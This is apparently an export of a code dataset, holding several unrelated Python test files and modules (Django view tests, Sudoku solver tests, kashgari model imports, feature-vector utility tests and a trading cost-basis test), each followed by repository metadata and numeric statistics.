'test_action_notification')
},
'watcher_object.name': 'ExceptionPayload',
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.0'
},
'updated_at': None,
'state': 'FAILED',
'action_plan': {
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.1',
'watcher_object.name': 'TerseActionPlanPayload',
'watcher_object.data': {
'uuid': '76be87bd-3422-43f9-93a0-e85a577e3061',
'global_efficacy': [],
'created_at': '2016-10-18T09:52:05Z',
'updated_at': None,
'state': 'ONGOING',
'audit_uuid': '10a47dd1-4874-4298'
'-91cf-eff046dbdb8d',
'strategy_uuid': 'cb3d0b58-4415-4d90'
'-b75b-1e96878730e3',
'deleted_at': None
}
},
'parents': [],
'action_type': 'nop',
'deleted_at': None
}
}
},
notification
)
| 46.176955
| 79
| 0.454639
| 1,800
| 22,442
| 5.470556
| 0.114444
| 0.089774
| 0.031685
| 0.050066
| 0.84249
| 0.820453
| 0.818016
| 0.818016
| 0.814055
| 0.814055
| 0
| 0.074653
| 0.441315
| 22,442
| 485
| 80
| 46.272165
| 0.710719
| 0.052224
| 0
| 0.712963
| 0
| 0
| 0.258496
| 0.08251
| 0
| 0
| 0
| 0
| 0.050926
| 1
| 0.023148
| false
| 0
| 0.020833
| 0
| 0.048611
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0ca6e76784d8cc4d7fc179379ebb67bbcb000548
| 5,945
|
py
|
Python
|
vol/test_views.py
|
volCommunity/vol-django
|
06c625f1cb2ca4b619dfcfa04a9ded445600ad7f
|
[
"Apache-2.0"
] | 5
|
2017-10-11T03:40:07.000Z
|
2018-07-09T12:30:13.000Z
|
vol/test_views.py
|
volCommunity/vol-django
|
06c625f1cb2ca4b619dfcfa04a9ded445600ad7f
|
[
"Apache-2.0"
] | 105
|
2017-09-28T00:41:00.000Z
|
2021-06-01T21:26:03.000Z
|
vol/test_views.py
|
volCommunity/vol-django
|
06c625f1cb2ca4b619dfcfa04a9ded445600ad7f
|
[
"Apache-2.0"
] | 3
|
2017-10-26T22:53:51.000Z
|
2017-11-01T18:43:22.000Z
|
from django.core.urlresolvers import reverse
from django.test import TransactionTestCase
from vol.factories import LabelsFactory, JobFactory
class IndexViewTests(TransactionTestCase):
# Assert we are redirected to a secure url
def test_index_insecure_redirects(self):
response = self.client.get(reverse('index'), secure=False)
self.assertEqual(response.status_code, 301)
def test_index_view(self):
response = self.client.get(reverse('index'), secure=True)
self.assertEqual(response.status_code, 200)
class ResultsViewTests(TransactionTestCase):
def test_get_results_none(self):
response = self.client.get('/results/Nonesense/Nonesense', secure=True)
self.assertEqual(response.context[0]['total_job_count'], 0)
self.assertEqual(response.context[0]['match_count'], 0)
self.assertEqual(response.context[0]['interests_matches_count'], 0)
self.assertEqual(response.context[0]['location_matches_count'], 0)
self.assertEqual(response.status_code, 200)
def test_get_results_one_complete_match(self):
label = LabelsFactory(name="nature")
job = JobFactory()
job.labels.add(label.id)
response = self.client.get('/results/wellington/nature', secure=True)
self.assertEqual(response.context[0]['total_job_count'], 1)
self.assertEqual(response.context[0]['match_count'], 1)
self.assertEqual(response.context[0]['interests_matches_count'], 1)
self.assertEqual(response.context[0]['location_matches_count'], 1)
self.assertEqual(response.status_code, 200)
def test_get_results_one_location_only(self):
label = LabelsFactory()
job = JobFactory()
job.labels.add(label.id)
response = self.client.get('/results/wellington/Nature', secure=True)
self.assertEqual(response.context[0]['total_job_count'], 1)
self.assertEqual(response.context[0]['match_count'], 1)
self.assertEqual(response.context[0]['interests_matches_count'], 0)
self.assertEqual(response.context[0]['location_matches_count'], 1)
self.assertEqual(response.status_code, 200)
def test_get_results_one_label_only(self):
label = LabelsFactory(name="nature")
job = JobFactory(city="Dunedin")
job.labels.add(label.id)
response = self.client.get('/results/wellington/nature', secure=True)
self.assertEqual(response.context[0]['total_job_count'], 1)
self.assertEqual(response.context[0]['match_count'], 0)
self.assertEqual(response.context[0]['interests_matches_count'], 1)
self.assertEqual(response.context[0]['location_matches_count'], 0)
self.assertEqual(response.status_code, 200)
def test_get_results_many(self):
label = LabelsFactory(name="nature")
job_one = JobFactory()
job_one.labels.add(label.id)
job_two = JobFactory(title="Butterfly catcher",
url="http://www.example.com/")
job_two.labels.add(label.id)
response = self.client.get('/results/wellington/nature', secure=True)
self.assertEqual(response.context[0]['total_job_count'], 2)
self.assertEqual(response.context[0]['match_count'], 2)
self.assertEqual(response.context[0]['interests_matches_count'], 2)
self.assertEqual(response.context[0]['location_matches_count'], 2)
self.assertEqual(response.status_code, 200)
def test_get_results_many_complete_match(self):
label = LabelsFactory(name="nature")
job_one = JobFactory()
job_one.labels.add(label.id)
job_two = JobFactory(title="Butterfly catcher",
url="http://www.example.com/")
job_two.labels.add(label.id)
response = self.client.get('/results/wellington/nature', secure=True)
self.assertEqual(response.context[0]['total_job_count'], 2)
self.assertEqual(response.context[0]['match_count'], 2)
self.assertEqual(response.context[0]['interests_matches_count'], 2)
self.assertEqual(response.context[0]['location_matches_count'], 2)
self.assertEqual(response.status_code, 200)
def test_get_results_many_location_only(self):
JobFactory()
JobFactory(title="Butterfly catcher",
url="http://www.example.com/")
response = self.client.get('/results/wellington/nature', secure=True)
self.assertEqual(response.context[0]['total_job_count'], 2)
self.assertEqual(response.context[0]['match_count'], 2)
self.assertEqual(response.context[0]['interests_matches_count'], 0)
self.assertEqual(response.context[0]['location_matches_count'], 2)
self.assertEqual(response.status_code, 200)
def test_get_results_many_label_only(self):
label = LabelsFactory(name="nature")
job_one = JobFactory(city="Dunedin")
job_one.labels.add(label.id)
job_two = JobFactory(title="Butterfly catcher",
city="Amsterdam")
job_two.labels.add(label.id)
response = self.client.get('/results/wellington/nature', secure=True)
self.assertEqual(response.context[0]['total_job_count'], 2)
self.assertEqual(response.context[0]['match_count'], 0)
self.assertEqual(response.context[0]['interests_matches_count'], 2)
self.assertEqual(response.context[0]['location_matches_count'], 0)
self.assertEqual(response.status_code, 200)
class JobViewTests(TransactionTestCase):
def test_get_job_none(self):
response = self.client.get('/jobs/028b7d48-3691-459e-93c3-5cd147a92dfd', secure=True)
self.assertEqual(response.status_code, 404)
def test_get_job_one(self):
job = JobFactory()
response = self.client.get('/jobs/{}'.format(job.slug), secure=True)
self.assertEqual(response.context[0]['job'], job)
| 43.07971
| 93
| 0.681918
| 714
| 5,945
| 5.501401
| 0.119048
| 0.168024
| 0.257637
| 0.252037
| 0.861762
| 0.844196
| 0.82943
| 0.792515
| 0.730143
| 0.717159
| 0
| 0.024809
| 0.186375
| 5,945
| 137
| 94
| 43.394161
| 0.787265
| 0.006728
| 0
| 0.67619
| 0
| 0
| 0.174657
| 0.103676
| 0
| 0
| 0
| 0
| 0.419048
| 1
| 0.114286
| false
| 0
| 0.028571
| 0
| 0.171429
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
0cca986ef8ce8b81444e34bedf8a15f55487b9ee
| 6,866
|
py
|
Python
|
tests/test_sudoku_pytest.py
|
nikhil642002/playground
|
f86276e4252c8c4eba9798157954a1502543faa9
|
[
"MIT"
] | null | null | null |
tests/test_sudoku_pytest.py
|
nikhil642002/playground
|
f86276e4252c8c4eba9798157954a1502543faa9
|
[
"MIT"
] | null | null | null |
tests/test_sudoku_pytest.py
|
nikhil642002/playground
|
f86276e4252c8c4eba9798157954a1502543faa9
|
[
"MIT"
] | 1
|
2020-10-01T12:54:51.000Z
|
2020-10-01T12:54:51.000Z
|
import Sudoku
i = [a for a in range(1, 10)]
# def template():
# input = [[i, i, i, i, i, i, i, i, i], # Template
# [i, i, i, i, i, i, i, i, i],
# [i, i, i, i, i, i, i, i, i],
# [i, i, i, i, i, i, i, i, i],
# [i, i, i, i, i, i, i, i, i],
# [i, i, i, i, i, i, i, i, i],
# [i, i, i, i, i, i, i, i, i],
# [i, i, i, i, i, i, i, i, i],
# [i, i, i, i, i, i, i, i, i]]
# assert sudoku.main(input) == [[6, 5, 8, 3, 4, 1, 2, 7, 9],
# [9, 3, 1, 2, 7, 6, 8, 4, 5],
# [2, 7, 4, 8, 9, 5, 3, 1, 6],
# [7, 2, 5, 1, 3, 9, 6, 8, 4],
# [4, 1, 9, 6, 8, 2, 7, 5, 3],
# [3, 8, 6, 7, 5, 4, 9, 2, 1],
# [1, 4, 2, 9, 6, 7, 5, 3, 8],
# [5, 6, 3, 4, 2, 8, 1, 9, 7],
# [8, 9, 7, 5, 1, 3, 4, 6, 2]]
def test_anti_brute_force():
input = [[i, i, i, i, i, i, i, i, i],
[i, i, i, i, i, 3, i, 8, 5],
[i, i, 1, i, 2, i, i, i, i],
[i, i, i, 5, i, 7, i, i, i],
[i, i, 4, i, i, i, 1, i, i],
[i, 9, i, i, i, i, i, i, i],
[5, i, i, i, i, i, i, 7, 3],
[i, i, 2, i, 1, i, i, i, i],
[i, i, i, i, 4, i, i, i, 9]]
assert Sudoku.main(input) == [[9, 8, 7, 6, 5, 4, 3, 2, 1],
[2, 4, 6, 1, 7, 3, 9, 8, 5],
[3, 5, 1, 9, 2, 8, 7, 4, 6],
[1, 2, 8, 5, 3, 7, 6, 9, 4],
[6, 3, 4, 8, 9, 2, 1, 5, 7],
[7, 9, 5, 4, 6, 1, 8, 3, 2],
[5, 1, 9, 2, 8, 6, 4, 7, 3],
[4, 7, 2, 3, 1, 9, 5, 6, 8],
[8, 6, 3, 7, 4, 5, 2, 1, 9]]
def test_easy():
input = [[5, 3, i, i, 7, i, i, i, i], # Easy
[6, i, i, 1, 9, 5, i, i, i],
[i, 9, 8, i, i, i, i, 6, i],
[8, i, i, i, 6, i, i, i, 3],
[4, i, i, 8, i, 3, i, i, 1],
[7, i, i, i, 2, i, i, i, 6],
[i, 6, i, i, i, i, 2, 8, i],
[i, i, i, 4, 1, 9, i, i, 5],
[i, i, i, i, 8, i, i, 7, 9]]
assert Sudoku.main(input) == [[5, 3, 4, 6, 7, 8, 9, 1, 2],
[6, 7, 2, 1, 9, 5, 3, 4, 8],
[1, 9, 8, 3, 4, 2, 5, 6, 7],
[8, 5, 9, 7, 6, 1, 4, 2, 3],
[4, 2, 6, 8, 5, 3, 7, 9, 1],
[7, 1, 3, 9, 2, 4, 8, 5, 6],
[9, 6, 1, 5, 3, 7, 2, 8, 4],
[2, 8, 7, 4, 1, 9, 6, 3, 5],
[3, 4, 5, 2, 8, 6, 1, 7, 9]]
def test_hard1():
input = [[i, 2, i, i, 1, i, 9, i, i],
[7, i, i, i, 8, i, i, i, 2],
[i, 5, 8, i, i, i, i, 6, i],
[i, i, i, 5, i, i, i, i, 3],
[i, 6, i, 1, i, 2, i, 7, i],
[1, i, i, i, i, 8, i, i, i],
[i, 9, i, i, i, i, 2, 4, i],
[3, i, i, i, 4, i, i, i, 9],
[i, i, 1, i, 5, i, i, 8, i]]
assert Sudoku.main(input) == [[4, 2, 3, 6, 1, 7, 9, 5, 8],
[7, 1, 6, 9, 8, 5, 4, 3, 2],
[9, 5, 8, 4, 2, 3, 7, 6, 1],
[2, 8, 7, 5, 6, 4, 1, 9, 3],
[5, 6, 9, 1, 3, 2, 8, 7, 4],
[1, 3, 4, 7, 9, 8, 6, 2, 5],
[8, 9, 5, 3, 7, 1, 2, 4, 6],
[3, 7, 2, 8, 4, 6, 5, 1, 9],
[6, 4, 1, 2, 5, 9, 3, 8, 7]]
def test_hard2():
input = [[1, 3, 5, i, i, i, i, 7, 8],
[i, i, i, i, 4, i, i, i, i],
[i, 8, i, i, i, i, i, i, 2],
[4, i, i, 6, 2, i, i, i, i],
[6, i, 7, 3, i, 4, 2, i, 5],
[i, i, i, i, 9, 5, i, i, 4],
[8, i, i, i, i, i, i, 9, i],
[i, i, i, i, 1, i, i, i, i],
[2, 1, i, i, i, i, 8, 4, 3]]
assert Sudoku.main(input) == [[1, 3, 5, 2, 6, 9, 4, 7, 8],
[7, 6, 2, 8, 4, 3, 1, 5, 9],
[9, 8, 4, 1, 5, 7, 3, 6, 2],
[4, 5, 8, 6, 2, 1, 9, 3, 7],
[6, 9, 7, 3, 8, 4, 2, 1, 5],
[3, 2, 1, 7, 9, 5, 6, 8, 4],
[8, 7, 6, 4, 3, 2, 5, 9, 1],
[5, 4, 3, 9, 1, 8, 7, 2, 6],
[2, 1, 9, 5, 7, 6, 8, 4, 3]]
def test_hard3():
input = [[6, i, i, 3, 4, i, i, 7, i],
[i, 3, i, 2, i, 6, i, i, i],
[2, i, 4, i, 9, i, i, 1, i],
[7, i, 5, i, i, i, i, 8, i],
[i, i, i, i, i, i, i, i, i],
[i, 8, i, i, i, i, 9, i, 1],
[i, 4, i, i, 6, i, 5, i, 8],
[i, i, i, 4, i, 8, i, 9, i],
[i, 9, i, i, 1, 3, i, i, 2]]
assert Sudoku.main(input) == [[6, 5, 8, 3, 4, 1, 2, 7, 9],
[9, 3, 1, 2, 7, 6, 8, 4, 5],
[2, 7, 4, 8, 9, 5, 3, 1, 6],
[7, 2, 5, 1, 3, 9, 6, 8, 4],
[4, 1, 9, 6, 8, 2, 7, 5, 3],
[3, 8, 6, 7, 5, 4, 9, 2, 1],
[1, 4, 2, 9, 6, 7, 5, 3, 8],
[5, 6, 3, 4, 2, 8, 1, 9, 7],
[8, 9, 7, 5, 1, 3, 4, 6, 2]]
def test_other():
input = [[0, 0, 0, 9, 0, 0, 8, 0, 0],
[0, 0, 4, 0, 1, 7, 0, 0, 9],
[0, 0, 7, 0, 0, 4, 0, 0, 0],
[0, 8, 0, 0, 4, 0, 9, 0, 1],
[0, 1, 0, 0, 0, 0, 0, 5, 0],
[7, 0, 5, 0, 2, 0, 0, 3, 0],
[0, 0, 0, 5, 0, 0, 6, 0, 0],
[3, 0, 0, 6, 8, 0, 7, 0, 0],
[0, 0, 2, 0, 0, 1, 0, 0, 0]]
assert Sudoku.main(input) == [[5, 2, 1, 9, 3, 6, 8, 4, 7],
[8, 3, 4, 2, 1, 7, 5, 6, 9],
[9, 6, 7, 8, 5, 4, 1, 2, 3],
[2, 8, 6, 3, 4, 5, 9, 7, 1],
[4, 1, 3, 7, 6, 9, 2, 5, 8],
[7, 9, 5, 1, 2, 8, 4, 3, 6],
[1, 4, 8, 5, 7, 3, 6, 9, 2],
[3, 5, 9, 6, 8, 2, 7, 1, 4],
[6, 7, 2, 4, 9, 1, 3, 8, 5]]
| 45.470199
| 64
| 0.211914
| 1,203
| 6,866
| 1.202826
| 0.0266
| 0.353836
| 0.389772
| 0.392536
| 0.557015
| 0.416033
| 0.348307
| 0.319281
| 0.307533
| 0.25501
| 0
| 0.265874
| 0.571075
| 6,866
| 150
| 65
| 45.773333
| 0.225467
| 0.14215
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.051724
| 1
| 0.051724
| false
| 0
| 0.008621
| 0
| 0.060345
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
49066de616512e45cae038a1c2f13b997809f23e
| 77
|
py
|
Python
|
website/assets/models/__init__.py
|
JobDoesburg/landolfio
|
4cbf31c2e6f93745f5aa0d20893bf20f3acecc6e
|
[
"MIT"
] | 1
|
2021-02-24T14:33:09.000Z
|
2021-02-24T14:33:09.000Z
|
website/assets/models/__init__.py
|
JobDoesburg/landolfio
|
4cbf31c2e6f93745f5aa0d20893bf20f3acecc6e
|
[
"MIT"
] | 2
|
2022-01-13T04:03:38.000Z
|
2022-03-12T01:03:10.000Z
|
website/assets/models/__init__.py
|
JobDoesburg/landolfio
|
4cbf31c2e6f93745f5aa0d20893bf20f3acecc6e
|
[
"MIT"
] | null | null | null |
from assets.models.asset import *
from assets.models.asset_location import *
| 25.666667
| 42
| 0.818182
| 11
| 77
| 5.636364
| 0.545455
| 0.322581
| 0.516129
| 0.677419
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103896
| 77
| 2
| 43
| 38.5
| 0.898551
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
490689ef8ddc9c463a5d1978d3f426b0dc4382c9
| 5,361
|
py
|
Python
|
test/test_feature_vector_creation_utilities.py
|
jeffharwell/viewpointdiversity
|
a9734f47e09e9269632d99139e4b58f5a68f44e6
|
[
"MIT"
] | null | null | null |
test/test_feature_vector_creation_utilities.py
|
jeffharwell/viewpointdiversity
|
a9734f47e09e9269632d99139e4b58f5a68f44e6
|
[
"MIT"
] | null | null | null |
test/test_feature_vector_creation_utilities.py
|
jeffharwell/viewpointdiversity
|
a9734f47e09e9269632d99139e4b58f5a68f44e6
|
[
"MIT"
] | null | null | null |
import unittest
import numpy as np
from src.viewpointdiversitydetection.feature_vector_creation_utilities import create_has_sentiments_present_vector
from src.viewpointdiversitydetection.feature_vector_creation_utilities import create_word2vec_present_vector
from src.viewpointdiversitydetection.feature_vector_creation_utilities import combine_as_average, combine_as_average_np
class FeatureVectorCreationUtilitiesTest(unittest.TestCase):
def test_create_has_sentiments_present_vector(self):
"""
Test class to ensure that the function create_has_sentiments_present_vector is actually working.
"""
v1 = [0.345, 0.655, 0, -0.3125, 0.6875, 0.345, 0.655, 0.0]
v2 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
self.assertTrue(create_has_sentiments_present_vector(v1, v2) == [1, 0])
v1 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
v2 = [0, 0.7695000000000001, 0.3073333333333333, 0.5, 1.0, 0.0, 1.0, 0.375]
self.assertTrue(create_has_sentiments_present_vector(v1, v2) == [0, 1])
v1 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
v2 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
self.assertTrue(create_has_sentiments_present_vector(v1, v2) == [0, 0])
v1 = [0.34, 0.66, 0, 0.2, 0.2, 0.34, 0.66, 0.0]
v2 = [0.3415, 0.579, 0.159, 0.3125, 0.4625, 0.371, 0.629, 0.159]
self.assertTrue(create_has_sentiments_present_vector(v1, v2) == [1, 1])
def test_create_word2vec_present_vector(self):
"""
Test class to ensure that the function create_has_sentiments_present_vector is actually working.
"""
# v1 = [0.345, 0.655, 0, -0.3125, 0.6875, 0.345, 0.655, 0.0]
# v2 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
v1 = np.random.rand(300)
v2 = np.zeros(300)
self.assertTrue(create_word2vec_present_vector(v1, v2) == [1, 0])
v1 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
v2 = [0, 0.7695000000000001, 0.3073333333333333, 0.5, 1.0, 0.0, 1.0, 0.375]
v1 = np.zeros(300)
v2 = np.random.rand(300)
self.assertTrue(create_word2vec_present_vector(v1, v2) == [0, 1])
v1 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
v2 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
v1 = np.zeros(300)
v2 = np.zeros(300)
self.assertTrue(create_word2vec_present_vector(v1, v2) == [0, 0])
v1 = [0.34, 0.66, 0, 0.2, 0.2, 0.34, 0.66, 0.0]
v2 = [0.3415, 0.579, 0.159, 0.3125, 0.4625, 0.371, 0.629, 0.159]
v1 = np.random.rand(300)
v2 = np.random.rand(300)
self.assertTrue(create_word2vec_present_vector(v1, v2) == [1, 1])
def test_combine_as_average(self):
"""
Test class to ensure that the function create_has_sentiments_present_vector is actually working.
"""
include_zeros = True
v1 = [0.345, 0.655, 0, -0.3125, 0.6875, 0.345, 0.655, 0.0]
v2 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
self.assertTrue(combine_as_average(v1, v2) == list(np.divide(v1, 2.0)))
self.assertTrue(combine_as_average(v1, v2, include_zeros=False) == v1)
v1 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
v2 = [0, 0.7695000000000001, 0.3073333333333333, 0.5, 1.0, 0.0, 1.0, 0.375]
self.assertTrue(combine_as_average(v1, v2) == list(np.divide(v2, 2.0)))
self.assertTrue(combine_as_average(v1, v2, include_zeros=False) == v2)
v1 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
v2 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
self.assertTrue(combine_as_average(v1, v2) == v1)
self.assertTrue(combine_as_average(v1, v2, include_zeros=False) == v1)
v1 = [0.34, 0.66, 0, 0.2, 0.2, 0.34, 0.66, 0.0]
v2 = [0.3415, 0.579, 0.159, 0.3125, 0.4625, 0.371, 0.629, 0.159]
self.assertTrue(combine_as_average(v1, v2) == list(np.divide(np.sum([np.array(v1), np.array(v2)], axis=0), 2)))
def test_combine_as_average_np(self):
"""
Test class to ensure that the function create_has_sentiments_present_vector is actually working.
"""
include_zeros = True
v1 = np.array([0.345, 0.655, 0, -0.3125, 0.6875, 0.345, 0.655, 0.0])
v2 = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])
self.assertTrue(np.array_equal(combine_as_average_np(v1, v2), np.divide(v1, 2.0)))
self.assertTrue(np.array_equal(combine_as_average_np(v1, v2, include_zeros=False), v1))
v1 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
v2 = [0, 0.7695000000000001, 0.3073333333333333, 0.5, 1.0, 0.0, 1.0, 0.375]
self.assertTrue(np.array_equal(combine_as_average(v1, v2), np.divide(v2, 2.0)))
self.assertTrue(np.array_equal(combine_as_average(v1, v2, include_zeros=False), v2))
v1 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
v2 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
self.assertTrue(np.array_equal(combine_as_average(v1, v2), v1))
self.assertTrue(np.array_equal(combine_as_average(v1, v2, include_zeros=False), v1))
v1 = [0.34, 0.66, 0, 0.2, 0.2, 0.34, 0.66, 0.0]
v2 = [0.3415, 0.579, 0.159, 0.3125, 0.4625, 0.371, 0.629, 0.159]
self.assertTrue(np.array_equal(combine_as_average(v1, v2), np.divide(np.sum([np.array(v1), np.array(v2)], axis=0), 2)))
if __name__ == '__main__':
unittest.main()
| 53.61
| 127
| 0.600261
| 1,001
| 5,361
| 3.080919
| 0.070929
| 0.177691
| 0.22179
| 0.26978
| 0.940013
| 0.916991
| 0.912451
| 0.899481
| 0.892996
| 0.866407
| 0
| 0.223498
| 0.220481
| 5,361
| 99
| 128
| 54.151515
| 0.514477
| 0.09196
| 0
| 0.540541
| 0
| 0
| 0.001676
| 0
| 0
| 0
| 0
| 0
| 0.297297
| 1
| 0.054054
| false
| 0
| 0.067568
| 0
| 0.135135
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
0b2fa418deb2ed032f17aa231cb7b546a6c9c219
| 1,217
|
py
|
Python
|
kashgari/tasks/labeling/__init__.py
|
ericperfect/Bert_Position_BiLSTM_Attention_CRF_LSTMDecoder
|
6c38d25572612ffc74c9c35c3e9c7382deca334c
|
[
"Apache-2.0"
] | 16
|
2020-12-02T13:44:20.000Z
|
2022-03-16T00:49:34.000Z
|
kashgari/tasks/labeling/__init__.py
|
ericperfect/Bert_Position_BiLSTM_Attention_CRF_LSTMDecoder
|
6c38d25572612ffc74c9c35c3e9c7382deca334c
|
[
"Apache-2.0"
] | 1
|
2022-01-11T08:14:05.000Z
|
2022-02-25T09:29:17.000Z
|
kashgari/tasks/labeling/__init__.py
|
ericperfect/Bert_Position_BiLSTM_Attention_CRF_LSTMDecoder
|
6c38d25572612ffc74c9c35c3e9c7382deca334c
|
[
"Apache-2.0"
] | 3
|
2021-06-18T00:00:58.000Z
|
2022-03-26T11:35:24.000Z
|
# encoding: utf-8
# author: BrikerMan
# contact: eliyar917@gmail.com
# blog: https://eliyar.biz
# file: __init__.py
# time: 2019-05-20 11:34
from kashgari.tasks.labeling.models import CNN_LSTM_Model
from kashgari.tasks.labeling.models import Bert_Position_BiLSTM_Attention_CRF_LSTMDecoder_Model
from kashgari.tasks.labeling.models import BiLSTM_Model
from kashgari.tasks.labeling.models import BiLSTM_CRF_Model
from kashgari.tasks.labeling.models import CNN_BiLSTM_CRF_Model
from kashgari.tasks.labeling.models import CNN_BiLSTM_CRF_Model_Attenetion
from kashgari.tasks.labeling.models import CNN_BiLSTM_CRF_Model_Position
from kashgari.tasks.labeling.models import BiGRU_Model
from kashgari.tasks.labeling.models import BiGRU_CRF_Model
from kashgari.tasks.labeling.models import CNN_BiLSTM_CRF_Model_WordSegmentation
from kashgari.tasks.labeling.models import BiLSTM_CRF_Model_Attention
from kashgari.tasks.labeling.models import BiLSTM_LSTMDecoder_CRF_Model
from kashgari.tasks.labeling.models import BiLSTM_LSTMDecoder_Model
from kashgari.tasks.labeling.models import BiLSTM_CRF_Model_Position
from kashgari.tasks.labeling.models import Bert_BiLSTM_CRF_Model
if __name__ == "__main__":
print("Hello world")
| 45.074074
| 95
| 0.861134
| 176
| 1,217
| 5.642045
| 0.261364
| 0.181269
| 0.256798
| 0.377644
| 0.799597
| 0.799597
| 0.799597
| 0.656596
| 0.550856
| 0.429003
| 0
| 0.014222
| 0.075596
| 1,217
| 26
| 96
| 46.807692
| 0.868444
| 0.105177
| 0
| 0
| 0
| 0
| 0.01756
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.882353
| 0
| 0.882353
| 0.058824
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0b6af29a73dfb39a27243337e04c1256d5ed0e7a
| 13,316
|
py
|
Python
|
tests/test_cost_basis.py
|
chesswiz16/Trader
|
008308016be6803094b4f5891efa8687af95bacf
|
[
"MIT"
] | 1
|
2018-01-11T14:39:18.000Z
|
2018-01-11T14:39:18.000Z
|
tests/test_cost_basis.py
|
chesswiz16/Trader
|
008308016be6803094b4f5891efa8687af95bacf
|
[
"MIT"
] | null | null | null |
tests/test_cost_basis.py
|
chesswiz16/Trader
|
008308016be6803094b4f5891efa8687af95bacf
|
[
"MIT"
] | null | null | null |
import logging
import unittest
from unittest.mock import Mock, MagicMock
from tests.authenticated_client_regression import AuthenticatedClientRegression
from trader.cost_basis import CostBasisTrader
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
class TestCostBasis(unittest.TestCase):
def test_on_order_done(self):
auth_client_mock = AuthenticatedClientRegression('ETH-USD', [100, 100, 100, 100], starting_balance=10000)
auth_client_mock.cancel_all = Mock()
auth_client_mock.get_product_ticker = MagicMock(return_value={
'price': '100',
})
trader = CostBasisTrader('ETH-USD', 3, 0.1, auth_client=auth_client_mock)
trader.on_start()
# Get limit order and mock it's been filled
limit_order = [x for x in auth_client_mock.orders if x['type'] == 'limit'][0]
self.assertEqual(len(auth_client_mock.orders), 2)
trader.on_order_done({
'order_id': limit_order['id'],
'reason': 'filled',
'product_id': 'ETH-USD',
})
self.assertEqual(trader.current_order_depth, 1)
self.assertEqual(trader.quote_currency_paid, 10 * 99.0)
self.assertEqual(trader.base_currency_bought, 10)
self.assertEqual(len(auth_client_mock.orders), 2)
expected = {
'side': 'sell',
'size': '10.0',
'price': '99.99',
'type': 'limit',
'post_only': True,
}
self.assertIn(expected, [{k: x[k] for k in expected.keys()} for x in auth_client_mock.orders])
expected = {
'side': 'buy',
'size': '10.30405061',
'price': '97.05',
'type': 'limit',
'post_only': True,
}
self.assertIn(expected, [{k: x[k] for k in expected.keys()} for x in auth_client_mock.orders])
# Get the buy order and mock that it's filled
buy_order = [x for x in auth_client_mock.orders if x['side'] == 'buy'][0]
trader.on_order_done({
'order_id': buy_order['id'],
'reason': 'filled',
'product_id': 'ETH-USD',
})
self.assertEqual(trader.current_order_depth, 2)
self.assertEqual(trader.quote_currency_paid, 1990.0081117005002)
self.assertEqual(trader.base_currency_bought, 20.30405061)
self.assertEqual(len(auth_client_mock.orders), 2)
expected = {
'side': 'sell',
'size': '20.30405061',
'price': '98.99',
'type': 'limit',
'post_only': True,
}
